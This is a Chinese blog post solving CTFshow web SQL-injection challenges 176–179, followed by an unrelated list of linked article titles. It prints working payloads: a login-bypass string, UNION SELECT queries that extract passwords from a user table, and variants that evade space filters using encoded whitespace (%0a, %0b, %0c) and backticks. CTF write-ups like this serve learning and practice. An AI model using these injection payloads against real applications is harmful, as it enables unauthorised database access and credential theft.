当前位置: 首页 > news >正文

CTFshow web(SQL注入176-179)

                                                                        web176

没啥好说的,直接上万能密码:

1' or username='flag

当然了还有别的方法:

1' union Select 1,2,group_concat(password) from ctfshow_user where username = 'flag' --+

 

                                                                      web177

没啥好说的,直接上万能密码:

1' or username='flag

 

白嫖不了,一眼看出过滤空格,验证:

发现回显,那就直接改变数字就好,就会返回不同的字段,这里教大家一招,很好用,把数字设置的很大就可以直接找到flag,不用一个个翻找

                                                                         web178

 经过测试发现/**/被过滤,那就换成反引号就好了

 99'union%0bselect'1',(select`password`from`ctfshow_user`where`username`='flag'),'3

或者:

'%0aUnion%0aSelect%0a1,2,group_concat(password)%0afrom%0actfshow_user%0awhere%0ausername='flag'%23

                                                                        web179

很多形式的空格类型被过滤,但是%0c还可以使用

'%0cUnion%0cSelect%0c1,2,group_concat(password)%0cfrom%0cctfshow_user%0cwhere%0cusername='flag'%23

希望文章能够帮助大家,谢谢!

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 海鹰数据:Shopee卖家的利器,助力选品决策
  • Quantitative Analysis: PIM Chip Demands for LLAMA-7B inference
  • Python算法100例-1.10 数制转换
  • Stable Diffusion 模型下载:Dark Sushi Mix 大颗寿司Mix
  • java面试多线程篇
  • 深度学习图像算法工程师--面试准备(1)
  • 【后端高频面试题--设计模式下篇】
  • python毕设选题 - 大数据二手房数据爬取与分析可视化 -python 数据分析 可视化
  • (14)Hive调优——合并小文件
  • 【递归】:原理、应用与案例解析 ,助你深入理解递归核心思想
  • 深度学习基础——卷积神经网络(一)
  • linux安装mysql8且初始化表名忽略大小写
  • c语言游戏实战(9):球球大作战
  • 网站管理新利器:免费在线生成 robots.txt 文件!
  • 51-2 万字长文,深度解读端到端自动驾驶的挑战和前沿
  • 【剑指offer】让抽象问题具体化
  • Android 初级面试者拾遗(前台界面篇)之 Activity 和 Fragment
  • Elasticsearch 参考指南(升级前重新索引)
  • java 多线程基础, 我觉得还是有必要看看的
  • PHP 程序员也能做的 Java 开发 30分钟使用 netty 轻松打造一个高性能 websocket 服务...
  • PHP 小技巧
  • ucore操作系统实验笔记 - 重新理解中断
  • vuex 笔记整理
  • 多线程 start 和 run 方法到底有什么区别?
  • 驱动程序原理
  • 实战|智能家居行业移动应用性能分析
  • 试着探索高并发下的系统架构面貌
  • k8s使用glusterfs实现动态持久化存储
  • 进程与线程(三)——进程/线程间通信
  • ​html.parser --- 简单的 HTML 和 XHTML 解析器​
  • ​LeetCode解法汇总2583. 二叉树中的第 K 大层和
  • ‌‌雅诗兰黛、‌‌兰蔻等美妆大品牌的营销策略是什么?
  • #define,static,const,三种常量的区别
  • #NOIP 2014# day.1 T2 联合权值
  • #vue3 实现前端下载excel文件模板功能
  • $.each()与$(selector).each()
  • (+3)1.3敏捷宣言与敏捷过程的特点
  • (11)MATLAB PCA+SVM 人脸识别
  • (24)(24.1) FPV和仿真的机载OSD(三)
  • (7)STL算法之交换赋值
  • (Redis使用系列) Springboot 使用redis的List数据结构实现简单的排队功能场景 九
  • (搬运以学习)flask 上下文的实现
  • (附源码)ssm基于微信小程序的疫苗管理系统 毕业设计 092354
  • (十二)python网络爬虫(理论+实战)——实战:使用BeautfulSoup解析baidu热搜新闻数据
  • (一)SpringBoot3---尚硅谷总结
  • .config、Kconfig、***_defconfig之间的关系和工作原理
  • .htaccess配置常用技巧
  • .NET Core 成都线下面基会拉开序幕
  • .NET Core、DNX、DNU、DNVM、MVC6学习资料
  • .Net CoreRabbitMQ消息存储可靠机制
  • .net 反编译_.net反编译的相关问题
  • .net 提取注释生成API文档 帮助文档
  • .net 无限分类
  • .NET 中 GetHashCode 的哈希值有多大概率会相同(哈希碰撞)
  • .NET 中的轻量级线程安全